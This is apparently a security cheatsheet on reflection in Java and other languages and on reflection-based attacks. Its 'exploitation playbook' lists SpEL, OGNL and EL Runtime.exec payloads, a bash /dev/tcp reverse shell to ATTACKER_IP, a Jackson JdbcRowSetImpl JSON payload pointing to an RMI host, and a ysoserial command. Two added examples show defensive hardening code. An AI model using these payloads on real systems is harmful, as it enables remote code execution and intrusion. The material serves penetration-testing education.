Reflection, Introspection - Cheatsheet

Reflection & Related Concepts Cheat Sheet

What is Reflection?

Reflection allows a program to inspect and modify its own structure and behavior at runtime.


Reflection in Java

  • Inspect classes, methods, fields
  • Access private members
  • Invoke methods dynamically

Example

import java.lang.reflect.Method;

// Load the class by name, build an instance through its no-arg constructor,
// then look up and call sayHello() without any compile-time reference to the type
Class<?> clazz = Class.forName("com.example.MyClass");
Object obj = clazz.getDeclaredConstructor().newInstance();
Method method = clazz.getDeclaredMethod("sayHello");
method.invoke(obj);

Reflection in Other Languages

Python (Introspection)

type(obj)
dir(obj)
getattr(obj, "method")()

C#

Type type = typeof(MyClass);
object obj = Activator.CreateInstance(type);

JavaScript

Reflect.get(obj, "name");

Go

reflect.TypeOf(obj)

C++

  • Limited (RTTI, templates)

Related Concepts

Concept          Description
Introspection    Inspect runtime objects
Metaprogramming  Code that modifies code
Annotations      Metadata on code
Code Generation  Generate code before runtime
Macros           Compile-time transformation


🔥 Reflection-Based Vulnerabilities

1. Java Deserialization Attacks

  • Uses reflection internally to instantiate objects
  • Attackers supply malicious serialized objects
  • Leads to Remote Code Execution (RCE)

Example

  • ysoserial payloads
  • Gadget chains (Commons Collections)

2. Spring Framework Exploits

  • Spring uses reflection for dependency injection
  • Exploits:
    • SpEL injection
    • Unsafe data binding
    • RCE via expression evaluation
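Added example (not from the gist) of the defensive side of the SpEL injection listed above: the same untrusted expression evaluated with Spring's StandardEvaluationContext and with SimpleEvaluationContext, which resolves no type references, so the T(...) form every exec() payload depends on fails before anything runs. The Order class is a constructed placeholder root object, and a spring-expression dependency is assumed.

```java
import org.springframework.expression.EvaluationException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

// Added example (not from the gist). Order is a constructed placeholder root object.
public class SpelHardening {

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Root object a template or rule engine legitimately reads from.
    public static class Order {
        private final int quantity;
        public Order(int quantity) { this.quantity = quantity; }
        public int getQuantity() { return quantity; }
    }

    // Expression a feature might legitimately accept from a user.
    static final String BENIGN = "quantity * 2";
    // Harmless type-reference probe: T(...) is the building block of the exec() payloads.
    static final String PROBE = "T(java.lang.System).getProperty('java.version')";

    // Vulnerable pattern: untrusted expression + StandardEvaluationContext, which exposes
    // type references, constructors, bean references and assignment to the expression.
    static Object evaluateUnsafe(String expr, Object root) {
        return PARSER.parseExpression(expr).getValue(new StandardEvaluationContext(root));
    }

    // Mitigation: a read-only data-binding SimpleEvaluationContext has no type locator,
    // so any T(...) reference fails at evaluation time with a SpelEvaluationException
    // while plain property access and arithmetic keep working.
    static Object evaluateHardened(String expr, Object root) {
        SimpleEvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        return PARSER.parseExpression(expr).getValue(ctx, root);
    }

    public static void main(String[] args) {
        Order root = new Order(3);
        System.out.println("unsafe, benign:   " + evaluateUnsafe(BENIGN, root));
        System.out.println("hardened, benign: " + evaluateHardened(BENIGN, root));
        // Standard context resolves the type and invokes the static method.
        System.out.println("unsafe, probe:    " + evaluateUnsafe(PROBE, root));
        try {
            evaluateHardened(PROBE, root);
        } catch (EvaluationException e) {
            System.out.println("hardened, probe:  blocked (" + e.getMessage() + ")");
        }
    }
}
```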

βš”οΈ Real-World Attack Chains Using Reflection

Typical Flow

  1. User input reaches deserialization/API
  2. Reflection loads attacker-controlled class/method
  3. Gadget chain triggers execution
  4. Achieves RCE

Example Chain

  • Input → Jackson deserialization → Reflection → Gadget → Runtime.exec()

🧪 Testing Reflection Abuse in VAPT

1. Identify Entry Points

  • Deserialization endpoints
  • Dynamic class loading
  • Expression evaluators

2. Payload Testing

  • Use ysoserial
  • Inject class names / method names

3. Look for:

  • Class.forName()
  • Method.invoke()
  • eval() / expression parsing

4. Tools

  • Burp Suite
  • ysoserial
  • custom fuzzers

5. Indicators of Vulnerability

  • Unexpected class loading
  • Stack traces revealing reflection usage
  • RCE or abnormal behavior

🧠 Key Tips

  • Reflection = powerful but dangerous
  • Prefer compile-time mechanisms where possible
  • Always validate inputs used in dynamic execution

Reflection Exploitation Playbook (VAPT)


1. Overview

This playbook provides step-by-step guidance to identify and exploit reflection-based vulnerabilities in applications.


2. Target Areas

2.1 Deserialization Endpoints

  • JSON (Jackson, Gson)
  • XML
  • Java serialized objects

2.2 Expression Engines

  • Spring SpEL
  • OGNL
  • MVEL

2.3 Dynamic Class Loading

  • Class.forName()
  • Custom plugin loaders

3. Step-by-Step Exploitation

Step 1: Identify Input Points

  • API endpoints
  • Headers
  • Cookies
  • File uploads

Step 2: Detect Reflection Usage

Indicators:

  • Stack traces containing:
    • java.lang.reflect.Method.invoke
    • Class.forName
  • Error messages revealing class names

Step 3: Test for Injection

Basic Payloads

${7*7}
#{7*7}

If evaluated → expression injection exists.


4. Exploitation Techniques

4.1 SpEL Injection (Spring)

RCE Payload

T(java.lang.Runtime).getRuntime().exec("id")

Reverse Shell Example

T(java.lang.Runtime).getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'")

4.2 Java Deserialization (ysoserial)

Generate Payload

java -jar ysoserial.jar CommonsCollections1 "id" > payload.bin

Send Payload

  • Upload endpoint
  • POST request body
  • Cookie/header injection

4.3 Jackson Exploit

Malicious JSON

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://ATTACKER_IP:1099/Exploit",
  "autoCommit": true
}

4.4 OGNL Injection (Struts)

#cmd='id'
#rt=@java.lang.Runtime@getRuntime()
#rt.exec(#cmd)

5. Full Attack Chain Example

  1. Identify JSON endpoint
  2. Detect deserialization (Jackson)
  3. Inject malicious @type
  4. Trigger reflection-based object creation
  5. Achieve RCE via gadget chain

6. Tools

  • Burp Suite
  • ysoserial
  • marshalsec
  • custom fuzzers

7. Detection Techniques

7.1 Automated

  • Scan for:
    • eval()
    • reflection APIs
    • unsafe deserialization

7.2 Manual

  • Review source code
  • Analyze stack traces

8. Post-Exploitation

  • Establish reverse shell
  • Privilege escalation
  • Persistence via cron/jobs

9. Mitigation

  • Disable unsafe deserialization
  • Use allowlists for classes
  • Avoid exposing expression evaluators
  • Sanitize inputs
  • Use security managers / sandboxing
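Added example (not from the gist) of the first two mitigations above, applied to the Java deserialization attacks described earlier: a JEP 290 ObjectInputFilter allowlist on ObjectInputStream, which rejects any class the stream names that the application does not expect, before that class's constructor or readObject() can run. The com.example.dto package in the pattern is a placeholder for the application's own DTO classes; HashMap stands in for an unexpected class.

```java
import java.io.*;
import java.util.*;

// Added example (not from the gist). com.example.dto.* is a placeholder for the
// application's own serializable DTO package.
public class DeserializationAllowlist {

    // JEP 290 filter: patterns are tried in order, '*' is a wildcard, '!' rejects, and the
    // trailing "!*" rejects every class not explicitly allowed before its readObject() runs.
    // java.lang.Object is listed because ArrayList's backing Object[] is checked as well.
    static final ObjectInputFilter ALLOWLIST = ObjectInputFilter.Config.createFilter(
            "com.example.dto.*;java.util.ArrayList;java.lang.Object;java.lang.String;"
            + "maxdepth=5;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    // Vulnerable pattern: any Serializable class on the classpath is instantiated on demand.
    static Object readUnfiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    // Hardened: the filter sees every class, array length and nesting depth the stream
    // names; a class outside the allowlist makes readObject() throw InvalidClassException.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ALLOWLIST);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        List<String> allowed = new ArrayList<>(List.of("a", "b"));
        System.out.println("allowed: " + readFiltered(serialize(allowed)));

        // HashMap stands in for any class the application never expects on the wire.
        Map<String, String> unexpected = new HashMap<>(Map.of("k", "v"));
        System.out.println("unfiltered: " + readUnfiltered(serialize(unexpected)));
        try {
            readFiltered(serialize(unexpected));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern syntax can be set process-wide with the jdk.serialFilter system property, which covers libraries that open their own ObjectInputStream.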

10. Quick Payload List

SpEL

T(java.lang.Runtime).getRuntime().exec("id")

OGNL

@java.lang.Runtime@getRuntime().exec("id")

EL

${''.getClass().forName('java.lang.Runtime').getRuntime().exec('id')}

11. Pro Tips

  • Always chain vulnerabilities
  • Reflection alone is not exploitable; it becomes exploitable only when attacker-controlled input decides which class or method gets loaded or invoked
  • Focus on frameworks (Spring, Struts)
